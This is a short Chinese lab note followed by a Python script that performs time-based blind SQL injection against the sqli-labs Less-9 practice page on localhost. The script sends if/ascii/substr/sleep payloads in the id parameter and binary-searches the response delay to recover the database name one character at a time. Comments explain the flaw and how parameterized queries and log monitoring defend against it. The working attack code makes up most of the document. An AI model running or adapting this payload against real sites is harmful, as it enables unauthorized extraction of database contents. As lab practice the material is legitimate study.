时间盲注
不会抛出错误语句，怎么都是返回一样的页面
jb不知道什么问题python发包时用parse不行,要直接拼在url上
import requests,time
# Time-based blind SQL injection probe against the local sqli-labs "Less-9" lab
# (http://127.0.0.1/Less-9/).  The page never changes its body, so the only
# signal is the response delay: each request asks the server to sleep(1) when
# the i-th character of database() is greater than `mid`, and a binary search
# over the printable-ASCII range (32..128) narrows the character down.
#
# Defender's view: the vulnerable pattern is the `id` parameter being
# concatenated into the SQL statement.  Parameterized queries remove the
# channel entirely; the traffic is also easy to spot server-side - a burst of
# requests to one endpoint carrying `sleep(`/`if(` in the query string, many of
# which take about one second longer than the rest.
name: str = ''  # recovered database name, one character appended per outer iteration
for i in range(1, 10):  # 1-based character position in database(); at most 9 characters are recovered
    low = 32   # inclusive lower bound of the candidate ASCII range
    high = 128  # exclusive upper bound
    mid = (low + high) // 2
    while low < high:
        # Dump the database name: the payload is built with str.format rather
        # than passed via `params=` (the author notes the latter did not work).
        url = "http://127.0.0.1/Less-9/?id=1' and if(ascii(substr((select database()),{0},1))>{1},sleep(1),0)--+".format(i, mid)
        start_time = time.time()  # wall-clock time before the request
        r = requests.get(url)  # NOTE(review): no timeout is set; the response body `r` is never inspected, only the elapsed time matters
        end_time = time.time()  # wall-clock time after the response
        if end_time - start_time > 1:
            # The server slept, so the condition "char > mid" was true.
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
        if mid <= 32 or mid >= 128:
            # Search collapsed onto a range boundary (e.g. past the end of the
            # string); stop probing this position.
            break
    # chr(mid) is appended even after the boundary break above, so a
    # non-printable/boundary value may end up in `name`.
    name = name + chr(mid)
    print(name)